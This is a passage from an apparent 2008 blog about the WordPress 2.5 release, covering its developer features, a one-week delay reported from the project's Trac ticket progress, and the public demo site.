Developer Features

  • Salted passwords
  • Secure cookies
  • Easy taxonomy and URL creation
  • Inline documentation
  • Database optimization
  • $wpdb->prepare()
  • Media buttons
  • Shortcode API

Theme and plugin issues shouldn’t be too major, but to be sure just check out the Codex for that.

Download WordPress 2.5 now!


WordPress 2.5 Delayed!

March 12, 2008 | No Comments Yet

Weblog Tools Collection reports that the much-awaited release of WordPress 2.5 has been delayed by a week. People have written countless posts about preparing for taking this major leap (especially since it skipped 2.4), while some are still hesitating.

According to the WordPress Trac, the WordPress team has reached only 58%, or closed 560 out of 966 tickets, so far. Here’s hoping there will be no more delays—or not, since you might be breathing a sigh of relief as you won’t have to scramble to update your site just yet.

WordPress 2.5 is now due on March 17, 2008.


WordPress 2.5 is Coming!

February 19, 2008 | 5 Comments

The WordPress community is buzzing about the WordPress 2.5 demo site, which is under heavy scrutiny, not to mention lots of malicious hackery. Still, it’s worth a look.

For those who don’t know, the developers are skipping WP 2.4 and heading straight to a version 2.5 release this March 10th. The Blog Herald has a great overview of all the things that need to be updated, be it themes or plugins, once WordPress 2.5 arrives. Of course, you can always check out the WordPress Codex page on the same topic.
